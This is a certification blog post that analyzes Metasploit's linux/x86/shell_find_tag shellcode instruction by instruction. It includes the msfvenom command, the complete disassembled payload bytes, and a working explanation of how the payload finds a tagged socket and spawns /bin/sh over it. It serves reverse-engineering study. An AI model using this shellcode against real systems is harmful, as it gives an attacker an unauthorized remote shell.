Analyzing Metasploit’s linux/x86/shell_find_tag payload

By Kevin Kirsche | August 27, 2018 | SLAE-x86

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134
Assignment number: 5.1
Github repo: https://github.com/kkirsche/SLAE


Introduction

Hey everyone! Today, we’re going to shift gears a little bit. Instead of writing our own assembly, we’re going to analyze someone else’s work. This is pretty interesting to me because it highlighted a payload that I didn’t know about, which we’ll be discussing today.

Requirements

  • Take at least 3 shellcode samples created using msfvenom for x86 Linux
  • Use GDB, ndisasm, and/or libemu to dissect the functionality of the shellcode
  • Present your analysis

Awesome. First off, this isn’t going to be the complete assignment 5. Instead, this post covers the first of the three shellcode samples generated using msfvenom for x86 Linux, and I’ll be writing separate articles for the other two payloads. The other two requirements (dissecting the shellcode and presenting the analysis) we can definitely meet here.

Our shellcode

So to get started, I had to choose what shellcode I was going to analyze. After looking through msfvenom’s payloads, I found one that seemed like it’d be interesting: the linux/x86/shell_find_tag payload by Skape (the same author we encountered during our egg hunter work!).

If we take a look at what options we have, we see there are a fair number of them:

linux/x86/shell_find_tag payload options

Wow! That’s a fair number of them. Interestingly though, all of them are advanced options, so they’re going to be outside of scope for this discussion.

As a result, we’ll dive right into analyzing the payload.

Libemu

First, we’ll take a look at the payload with libemu. Libemu, if you aren’t familiar with it, is a library used to emulate things like raw shellcode and provide you with information about what it’s doing. In our case, we’re using its sctest binary with a few options. Specifically, we want verbose output (-vvv), to read the payload from stdin (-S), and to run up to 10000 steps (-s 10000) of emulation. This makes sure that we’ve fully processed the shellcode. We can do this with:

msfvenom -p linux/x86/shell_find_tag --platform linux -a x86 -e generic/none | sctest -vvv -Ss 10000

Oddly, while we got a large amount of output from sctest, it doesn’t seem to output any pseudocode for this payload, which it often does for others. So let’s see if we can get a graphical representation of what’s happening instead.

msfvenom -p linux/x86/shell_find_tag --platform linux -a x86 -e generic/none | sctest -vvv -Ss 10000 -G shell_find_tag.dot && dot shell_find_tag.dot -T png > shell_find_tag.png

This will generate our payload and pass it to sctest, which will process it and generate a dot file. The dot file is then converted into a PNG using graphviz’s dot binary, which we can then view. When we do this, we see:

shell_find_tag call graph

So it seems that libemu / sctest was able to read it, just not decide what the pseudocode should have been. Somewhat confusingly, we also end up with a different (though similar) listing from the graph above when we use ndisasm -u - (-u is shorthand to state this is 32-bit code, and the trailing - reads from stdin):

ndisasm


msfvenom -p linux/x86/shell_find_tag --platform linux -a x86 -e generic/none | ndisasm -u -
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 69 (iteration=0)
generic/none chosen with final size 69
Payload size: 69 bytes
00000000 31DB xor ebx,ebx
00000002 53 push ebx
00000003 89E6 mov esi,esp
00000005 6A40 push byte +0x40
00000007 B70A mov bh,0xa
00000009 53 push ebx
0000000A 56 push esi
0000000B 53 push ebx
0000000C 89E1 mov ecx,esp
0000000E 86FB xchg bh,bl
00000010 66FF01 inc word [ecx]
00000013 6A66 push byte +0x66
00000015 58 pop eax
00000016 CD80 int 0x80
00000018 813E47354F4F cmp dword [esi],0x4f4f3547
0000001E 75F0 jnz 0x10
00000020 5F pop edi
00000021 89FB mov ebx,edi
00000023 6A02 push byte +0x2
00000025 59 pop ecx
00000026 6A3F push byte +0x3f
00000028 58 pop eax
00000029 CD80 int 0x80
0000002B 49 dec ecx
0000002C 79F8 jns 0x26
0000002E 6A0B push byte +0xb
00000030 58 pop eax
00000031 99 cdq
00000032 52 push edx
00000033 682F2F7368 push dword 0x68732f2f
00000038 682F62696E push dword 0x6e69622f
0000003D 89E3 mov ebx,esp
0000003F 52 push edx
00000040 53 push ebx
00000041 89E1 mov ecx,esp
00000043 CD80 int 0x80

This seems to make a bit more sense, so we’ll use this to dissect what’s actually happening.
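As a quick sanity check on the listing above, we can reassemble the opcode bytes and recompute the two short-jump targets by hand. This is only a sketch of my own, not anything msfvenom provides: the hex string is copied from the second column of the ndisasm output, and rel8_target is a hypothetical helper name.

```python
# Opcode bytes copied from the second column of the ndisasm listing, in order.
PAYLOAD = bytes.fromhex(
    "31db5389e66a40b70a53565389e186fb"
    "66ff016a6658cd80813e47354f4f75f0"
    "5f89fb6a02596a3f58cd804979f8"
    "6a0b589952682f2f7368682f62696e"
    "89e3525389e1cd80"
)


def rel8_target(code: bytes, offset: int) -> int:
    """Destination of the two-byte short jump (opcode + rel8) at `offset`."""
    # The displacement is a signed byte, relative to the next instruction.
    rel = int.from_bytes(code[offset + 1:offset + 2], "little", signed=True)
    return offset + 2 + rel


print(len(PAYLOAD))                      # payload size in bytes
print(hex(rel8_target(PAYLOAD, 0x1E)))   # where the jnz at 0x1E goes
print(hex(rel8_target(PAYLOAD, 0x2C)))   # where the jns at 0x2C goes
print(PAYLOAD[0x1A:0x1E])                # immediate operand of the cmp at 0x18
```

This should print 69, 0x10, 0x26 and b'G5OO', which agrees with the size msfvenom reported and with the jump targets ndisasm shows. The four-byte tag will differ from one generated payload to the next, so the bytes here are specific to this run.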

What’s the assembly mean?

First function


00000000 31DB xor ebx,ebx
00000002 53 push ebx
00000003 89E6 mov esi,esp
00000005 6A40 push byte +0x40
00000007 B70A mov bh,0xa
00000009 53 push ebx
0000000A 56 push esi
0000000B 53 push ebx
0000000C 89E1 mov ecx,esp
0000000E 86FB xchg bh,bl
00000010 66FF01 inc word [ecx]
00000013 6A66 push byte +0x66
00000015 58 pop eax
00000016 CD80 int 0x80

So the first thing that jumps out here are lines 00000013 and 00000015, since we can quickly see that this is a socketcall operation. We’ll want to look this up so that we can see what the function signature we’re looking at actually looks like. In this case, at 00000007, we see mov bh, 0xa. If we look this up, 0xa is the SYS_RECV socketcall. This means we’re building the following function signature:

recv(int sockfd, void *buf, size_t len, int flags)
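To make the lookup concrete, here is a small sketch of how the EAX/EBX pair maps onto a socketcall sub-call. The numbers are the sub-call values from Linux’s linux/net.h (only the first ten are listed); the dictionary and the describe_socketcall helper are names I made up for illustration.

```python
SYS_SOCKETCALL = 0x66  # syscall number placed in EAX on 32-bit x86 Linux

# Sub-call numbers passed in EBX, as defined in <linux/net.h>.
SOCKETCALL_NAMES = {
    1: "SYS_SOCKET",
    2: "SYS_BIND",
    3: "SYS_CONNECT",
    4: "SYS_LISTEN",
    5: "SYS_ACCEPT",
    6: "SYS_GETSOCKNAME",
    7: "SYS_GETPEERNAME",
    8: "SYS_SOCKETPAIR",
    9: "SYS_SEND",
    10: "SYS_RECV",
}


def describe_socketcall(eax: int, ebx: int) -> str:
    """Name the sub-call selected by EBX; ECX would point at its arguments."""
    if eax != SYS_SOCKETCALL:
        raise ValueError("EAX does not hold the socketcall number")
    return f"socketcall({SOCKETCALL_NAMES[ebx]}, args)"


print(describe_socketcall(0x66, 0x0A))
```

With EAX at 0x66 and EBX at 0x0a, this reports SYS_RECV, so ECX has to point at the four recv arguments laid out in memory in declaration order.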

First, we see xor ebx, ebx which is clearing out the EBX register. This gives us a starting register structure of:

Address   Instruction      EAX         EBX     ECX         EDX      ESI
00000000  xor ebx, ebx     Unknown     0x0000  Unknown     Unknown  Unknown

We then push EBX (zero) onto the stack. This dword is not an argument; it is the four bytes of scratch space that recv will write into. We then copy ESP into ESI, which stores a pointer to that buffer for us. Our registers now look like:

Address   Instruction      EAX         EBX     ECX         EDX      ESI
00000000  xor ebx, ebx     Unknown     0x0000  Unknown     Unknown  Unknown
00000002  push ebx         Unknown     0x0000  Unknown     Unknown  Unknown
00000003  mov esi, esp     Unknown     0x0000  Unknown     Unknown  0xffffd16c

We then push 0x40 (64 decimal) onto the stack as our flags argument, which is MSG_DONTWAIT on Linux, so recv returns immediately instead of blocking on a socket with no data. We then move 0xa (10 decimal) into bh (the high byte of BX; we’ll switch where this value is later).

Our registers now look like:

Address   Instruction      EAX         EBX     ECX         EDX      ESI
00000000  xor ebx, ebx     Unknown     0x0000  Unknown     Unknown  Unknown
00000002  push ebx         Unknown     0x0000  Unknown     Unknown  Unknown
00000003  mov esi, esp     Unknown     0x0000  Unknown     Unknown  0xffffd16c
00000005  push byte +0x40  Unknown     0x0000  Unknown     Unknown  0xffffd16c
00000007  mov bh,0xa       Unknown     0x0a00  Unknown     Unknown  0xffffd16c

Cool, we have 0xa in bh now. We then push EBX (0x0a00 hex / 2560 decimal) onto the stack as our length argument, and push ESI, which is a pointer to the buffer we’re going to write to. Then we push EBX again, which puts 0x0a00 onto the stack a second time, this time as the starting value for the socket file descriptor. At this point, our stack looks like this:

Function arguments on the stack
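The pushes can also be replayed in a few lines to reconstruct the layout, with sockfd ending up at the lowest address so that the four arguments sit in memory in recv’s declaration order. This is a sketch under assumptions: the ESI value is simply the one seen in this post’s register tables (it will differ from run to run), and build_recv_frame is a hypothetical helper of my own.

```python
ESI_OBSERVED = 0xFFFFD16C  # taken from the register tables; varies per run


def build_recv_frame(esi: int = ESI_OBSERVED):
    """Replay the five pushes; return (ecx, {address: (value, meaning)})."""
    esp = esi + 4  # ESP before the first push, so that push lands at ESI
    frame = {}

    def push(value: int, meaning: str) -> None:
        nonlocal esp
        esp -= 4  # the x86 stack grows toward lower addresses
        frame[esp] = (value, meaning)

    ebx = 0x0000                       # xor ebx,ebx
    push(ebx, "4-byte receive buffer (ESI points here)")
    push(0x40, "flags = MSG_DONTWAIT")
    ebx = 0x0A00                       # mov bh,0xa
    push(ebx, "len = 2560")
    push(esi, "buf = pointer to the receive buffer")
    push(ebx, "sockfd, incremented before every recv")
    return esp, frame                  # mov ecx,esp


ecx, frame = build_recv_frame()
for address in sorted(frame):
    value, meaning = frame[address]
    marker = "  <- ECX" if address == ecx else ""
    print(f"0x{address:08x}  0x{value:08x}  {meaning}{marker}")
```

The lowest address printed is the one ECX ends up holding, 16 bytes below ESI, which matches the 0xffffd15c / 0xffffd16c pair in the register tables.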

With our function arguments on the stack, we move a pointer to our arguments into ECX, exchange BH and BL (moving 0x0a into bl, which gives us SYS_RECV in EBX) and increment the socket file descriptor (remember that [ecx] dereferences the pointer stored in ECX, and sockfd is the first argument). This changes 0x0a00 to 0x0a01. We then push 0x66 (the socketcall system call number) onto the stack and pop it into EAX. With that complete, we trigger our system call. Throughout this, our registers progress like so:

Address   Instruction      EAX         EBX     ECX         EDX      ESI
00000000  xor ebx, ebx     Unknown     0x0000  Unknown     Unknown  Unknown
00000002  push ebx         Unknown     0x0000  Unknown     Unknown  Unknown
00000003  mov esi, esp     Unknown     0x0000  Unknown     Unknown  0xffffd16c
00000005  push byte +0x40  Unknown     0x0000  Unknown     Unknown  0xffffd16c
00000007  mov bh,0xa       Unknown     0x0a00  Unknown     Unknown  0xffffd16c
00000009  push ebx         Unknown     0x0a00  Unknown     Unknown  0xffffd16c
0000000A  push esi         Unknown     0x0a00  Unknown     Unknown  0xffffd16c
0000000B  push ebx         Unknown     0x0a00  Unknown     Unknown  0xffffd16c
0000000C  mov ecx,esp      Unknown     0x0a00  0xffffd15c  Unknown  0xffffd16c
0000000E  xchg bh,bl       Unknown     0x000a  0xffffd15c  Unknown  0xffffd16c
00000010  inc word [ecx]   Unknown     0x000a  0xffffd15c  Unknown  0xffffd16c
00000013  push byte +0x66  Unknown     0x000a  0xffffd15c  Unknown  0xffffd16c
00000015  pop eax          0x0066      0x000a  0xffffd15c  Unknown  0xffffd16c
00000016  int 0x80         0xfffffff7  0x000a  0xffffd15c  Unknown  0xffffd16c
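The 0xfffffff7 that lands in EAX after int 0x80 is the system call’s return value. Linux reports failures as a negated errno, so reading the register as a signed 32-bit number tells us what went wrong. The sketch below does that conversion; to_signed32 is a helper name of my own, and my reading that the test process simply had no descriptor 0x0a01 open is an inference from the table, not something the original run logged.

```python
import errno


def to_signed32(value: int) -> int:
    """Interpret a 32-bit register value as a two's-complement integer."""
    value &= 0xFFFFFFFF
    return value - 0x1_0000_0000 if value & 0x8000_0000 else value


ret = to_signed32(0xFFFFFFF7)
print(ret)                                      # negative means failure
print(errno.errorcode.get(-ret, "unknown"))     # symbolic errno name
```

On Linux this comes out as -9, which is EBADF (bad file descriptor), the expected result of calling recv on a descriptor number that isn’t open.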

So with that knowledge, we can comment this first block like so:


00000000 31DB xor ebx,ebx ; zero out EBX
00000002 53 push ebx ; push 0x0 as where we'll write our buffer
00000003 89E6 mov esi,esp ; store a pointer to that buffer in ESI
00000005 6A40 push byte +0x40 ; MSG_DONTWAIT flag
00000007 B70A mov bh,0xa ; 0x0a00 will be the len
00000009 53 push ebx ; push 0x0a00 onto the stack for our len argument
0000000A 56 push esi ; push the pointer to our buffer onto the stack
0000000B 53 push ebx ; 0x0a00 onto the stack for our sockfd
0000000C 89E1 mov ecx,esp ; pointer to our function arguments
0000000E 86FB xchg bh,bl ; make EBX 0x000a for our SYS_RECV socketcall
00000010 66FF01 inc word [ecx] ; increment our sockfd from 0x0a00 to 0x0a01
00000013 6A66 push byte +0x66 ; push the socketcall number onto the stack
00000015 58 pop eax ; pop the value into EAX
00000016 CD80 int 0x80 ; perform the socketcall
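The sub-register tricks in this block (mov bh, xchg bh,bl and the 16-bit inc) are easy to get wrong in your head, so here is a small model of them using plain integers. The function names are mine and purely illustrative; only the bit manipulation mirrors what the instructions do.

```python
def set_bh(ebx: int, value: int) -> int:
    """mov bh, imm8: replace bits 8-15 of EBX and leave the rest alone."""
    return (ebx & 0xFFFF00FF) | ((value & 0xFF) << 8)


def xchg_bh_bl(ebx: int) -> int:
    """xchg bh, bl: swap the two low bytes of EBX."""
    bl = ebx & 0xFF
    bh = (ebx >> 8) & 0xFF
    return (ebx & 0xFFFF0000) | (bl << 8) | bh


def inc_word(dword: int) -> int:
    """inc word [mem]: add one to the low 16 bits only, wrapping at 0xffff."""
    return (dword & 0xFFFF0000) | ((dword + 1) & 0xFFFF)


ebx = set_bh(0x00000000, 0x0A)   # EBX after mov bh,0xa
sockfd = ebx                     # the copy pushed as the sockfd argument
ebx = xchg_bh_bl(ebx)            # EBX now selects SYS_RECV
sockfd = inc_word(sockfd)        # first descriptor that gets tried
print(hex(ebx), hex(sockfd))
print(hex(inc_word(0xFFFF)))     # what happens at the top of the range
```

One consequence of the word-sized increment is that the descriptor counter wraps from 0xffff back to 0 rather than growing forever, so if the search runs long enough it also reaches the low descriptor numbers.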

Awesome! We understand the first block of this.

Second function


00000010 66FF01 inc word [ecx] ; increment our sockfd from 0x0a00 to 0x0a01
00000013 6A66 push byte +0x66 ; push the socketcall number onto the stack
00000015 58 pop eax ; pop the value into EAX
00000016 CD80 int 0x80 ; perform the socketcall
00000018 813E47354F4F cmp dword [esi],0x4f4f3547
0000001E 75F0 jnz 0x10
00000020 5F pop edi
00000021 89FB mov ebx,edi
00000023 6A02 push byte +0x2
00000025 59 pop ecx
00000026 6A3F push byte +0x3f
00000028 58 pop eax
00000029 CD80 int 0x80
0000002B 49 dec ecx
0000002C 79F8 jns 0x26

So first, we compare the dword that ESI points to (our receive buffer) with a set of bytes. These bytes translate from 0x4f4f3547 to G5OO (switching the byte order from little endian to human readable). This is the TAG option from the advanced options section, which is used to identify the connection. If we didn’t receive it, we jump back to 00000010, which is our inc word [ecx] instruction (incrementing our socket file descriptor), and repeat the socketcall to recv. The jump is a jnz (jump if not zero) because cmp sets the zero flag only when the two values are equal, so the branch is taken whenever the tag did not match. Essentially we’re looping through the socket file descriptors until we find the connection that we want to use. This repeats 00000010 through 0000001E until we find the socket.
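Here is a rough simulation of that search loop. It is only a model: the pending dictionary stands in for whatever data is waiting on each descriptor (a hypothetical replacement for the real recv call), find_tagged_fd is a name I made up, and the max_tries bound exists only so the sketch terminates, whereas the real shellcode loops until it finds the tag.

```python
import struct

TAG_IMMEDIATE = 0x4F4F3547
TAG = struct.pack("<I", TAG_IMMEDIATE)  # the bytes as they sit in memory


def find_tagged_fd(pending, start=0x0A00, max_tries=0x10000):
    """Return the first descriptor whose waiting data starts with TAG.

    `pending` maps descriptor number -> bytes waiting on that socket.
    """
    fd = start
    for _ in range(max_tries):
        fd = (fd + 1) & 0xFFFF          # inc word [ecx]
        data = pending.get(fd, b"")     # recv(fd, buf, 0x0a00, MSG_DONTWAIT)
        if data[:4] == TAG:             # cmp dword [esi], 0x4f4f3547
            return fd                   # ZF set: fall through to pop edi
        # ZF clear: jnz 0x10, try the next descriptor
    return None


print(TAG)
print(find_tagged_fd({0x0A05: b"G5OO"}))
```

In a real run the side that delivered the exploit would send the four tag bytes over its existing connection, and the loop stops on whichever descriptor they arrive on.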

When we do find the socket, we pop the sockfd into EDI (remember that we’ve been incrementing the file descriptor on the stack) and copy it into EBX. We then begin the process we used for our bind and reverse shells, calling dup2 to connect stdin, stdout and stderr to the socket. With this knowledge, we can comment the code like so:


00000010 66FF01 inc word [ecx] ; increment our sockfd from 0x0a00 to 0x0a01
00000013 6A66 push byte +0x66 ; push the socketcall number onto the stack
00000015 58 pop eax ; pop the value into EAX
00000016 CD80 int 0x80 ; perform the socketcall
00000018 813E47354F4F cmp dword [esi],0x4f4f3547 ; compare the value we received in our buffer to G5OO
0000001E 75F0 jnz 0x10 ; if we didn't find our tag, jump back to 00000010 so we can look at the next socket
00000020 5F pop edi ; we found it! pop sockfd into EDI
00000021 89FB mov ebx,edi ; save sockfd in EBX for our dup2 calls
00000023 6A02 push byte +0x2 ; we want to do three iterations of dup2 (2, 1, and 0) so we push the value
00000025 59 pop ecx ; then pop it into ECX
00000026 6A3F push byte +0x3f ; 0x3f is the dup2 syscall
00000028 58 pop eax ; which we need in EAX for our function call
00000029 CD80 int 0x80 ; execute dup2
0000002B 49 dec ecx ; decrement our counter
0000002C 79F8 jns 0x26 ; if the sign flag isn't set (ECX hasn't reached -1), we're not done looping yet. Go back to the dup2 call at 00000026
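The dec ecx / jns pair is a compact countdown loop, and it can be mirrored in a few lines. In this sketch the dup2 function is passed in as a parameter (my own choice, so the example can run without touching the real standard streams); in a live process you could pass os.dup2 instead. The name dup2_loop is hypothetical.

```python
def dup2_loop(sockfd, dup2):
    """Call dup2(sockfd, n) for n = 2, 1, 0, as the dec ecx / jns loop does."""
    ecx = 2                      # push byte +0x2 ; pop ecx
    while True:
        dup2(sockfd, ecx)        # eax = 0x3f, ebx = sockfd, ecx = target fd
        ecx -= 1                 # dec ecx
        if ecx < 0:              # sign flag set: jns falls through
            break


calls = []
dup2_loop(0x0A05, lambda old, new: calls.append((old, new)))
print(calls)
```

The recorded calls show stderr, stdout and stdin (in that order) being pointed at the socket, and the loop ending once the counter goes negative.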

Third / Final Function


0000002E 6A0B push byte +0xb
00000030 58 pop eax
00000031 99 cdq
00000032 52 push edx
00000033 682F2F7368 push dword 0x68732f2f
00000038 682F62696E push dword 0x6e69622f
0000003D 89E3 mov ebx,esp
0000003F 52 push edx
00000040 53 push ebx
00000041 89E1 mov ecx,esp
00000043 CD80 int 0x80

Onto our last function call! We first push 0xb onto the stack and pop it into EAX. If you remember, 0xb is the execve system call. We then clear EDX using CDQ, which sign-extends EAX into EDX (EAX is a small positive number, so EDX becomes zero). From 00000032 through 00000038 we push /bin//sh with a null terminator onto the stack (the command we want to execute). We put a pointer to the command string into EBX, push a null value onto the stack via push edx, push the pointer to the string onto the stack, and move ESP into ECX, which gives us a NULL-terminated argv array. EDX, still zero, serves as a NULL envp. We then trigger the system call, giving us a shell on the existing socket connection.

With comments, this looks like:

0000002E 6A0B push byte +0xb ; push the execve system call number onto the stack
00000030 58 pop eax ; and pop it into EAX
00000031 99 cdq ; zero out EDX
00000032 52 push edx ; NULL string terminator
00000033 682F2F7368 push dword 0x68732f2f ; hs//
00000038 682F62696E push dword 0x6e69622f ; nib/
0000003D 89E3 mov ebx,esp ; pointer to /bin//sh into EBX
0000003F 52 push edx ; push NULL to terminate the argv array
00000040 53 push ebx ; push the pointer to /bin//sh (argv[0])
00000041 89E1 mov ecx,esp ; move the pointer to the argv array into ECX
00000043 CD80 int 0x80 ; and pop our shell
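If the reversed hs// and nib/ comments look odd, the sketch below rebuilds the string the way it actually ends up in memory and models what CDQ does to EDX. The helper name cdq and the pushes list are my own; the dword values are the ones from the listing.

```python
import struct


def cdq(eax: int) -> int:
    """EDX after CDQ: EAX's sign bit copied into every bit of EDX."""
    return 0xFFFFFFFF if eax & 0x80000000 else 0x00000000


# Values in the order they are pushed: terminator, then the two string dwords.
pushes = [cdq(0x0B), 0x68732F2F, 0x6E69622F]

# The last push sits at the lowest address, so memory reads in reverse order,
# and each dword is stored little endian.
stack_bytes = b"".join(struct.pack("<I", value) for value in reversed(pushes))
path = stack_bytes.split(b"\x00", 1)[0]

print(hex(cdq(0x0B)))
print(path)
```

Taken together, the final system call is roughly equivalent to execve of /bin//sh with an argv of just that path followed by NULL, and a NULL envp.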

Putting it all together

Now that we’ve commented the shellcode, let’s put the individual pieces together so that we have the full picture of what’s happening.


00000000 31DB xor ebx,ebx ; zero out EBX
00000002 53 push ebx ; push 0x0 as where we'll write our buffer
00000003 89E6 mov esi,esp ; store a pointer to that buffer in ESI
00000005 6A40 push byte +0x40 ; MSG_DONTWAIT flag
00000007 B70A mov bh,0xa ; 0x0a00 will be the len
00000009 53 push ebx ; push 0x0a00 onto the stack for our len argument
0000000A 56 push esi ; push the pointer to our buffer onto the stack
0000000B 53 push ebx ; 0x0a00 onto the stack for our sockfd
0000000C 89E1 mov ecx,esp ; pointer to our function arguments
0000000E 86FB xchg bh,bl ; make EBX 0x000a for our SYS_RECV socketcall
00000010 66FF01 inc word [ecx] ; increment our sockfd from 0x0a00 to 0x0a01
00000013 6A66 push byte +0x66 ; push the socketcall number onto the stack
00000015 58 pop eax ; pop the value into EAX
00000016 CD80 int 0x80 ; perform the socketcall
00000018 813E47354F4F cmp dword [esi],0x4f4f3547 ; compare the value we received in our buffer to G5OO
0000001E 75F0 jnz 0x10 ; if we didn't find our tag, jump back to 00000010 so we can look at the next socket
00000020 5F pop edi ; we found it! pop sockfd into EDI
00000021 89FB mov ebx,edi ; save sockfd in EBX for our dup2 calls
00000023 6A02 push byte +0x2 ; we want to do three iterations of dup2 (2, 1, and 0) so we push the value
00000025 59 pop ecx ; then pop it into ECX
00000026 6A3F push byte +0x3f ; 0x3f is the dup2 syscall
00000028 58 pop eax ; which we need in EAX for our function call
00000029 CD80 int 0x80 ; execute dup2
0000002B 49 dec ecx ; decrement our counter
0000002C 79F8 jns 0x26 ; if the sign flag isn't set (ECX hasn't reached -1), we're not done looping yet. Go back to the dup2 call at 00000026
0000002E 6A0B push byte +0xb ; push the execve system call number onto the stack
00000030 58 pop eax ; and pop it into EAX
00000031 99 cdq ; zero out EDX
00000032 52 push edx ; NULL string terminator
00000033 682F2F7368 push dword 0x68732f2f ; hs//
00000038 682F62696E push dword 0x6e69622f ; nib/
0000003D 89E3 mov ebx,esp ; pointer to /bin//sh into EBX
0000003F 52 push edx ; push NULL to terminate the argv array
00000040 53 push ebx ; push the pointer to /bin//sh (argv[0])
00000041 89E1 mov ecx,esp ; move the pointer to the argv array into ECX
00000043 CD80 int 0x80 ; and pop our shell

This gives us a complete understanding of how the linux/x86/shell_find_tag payload works.

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.
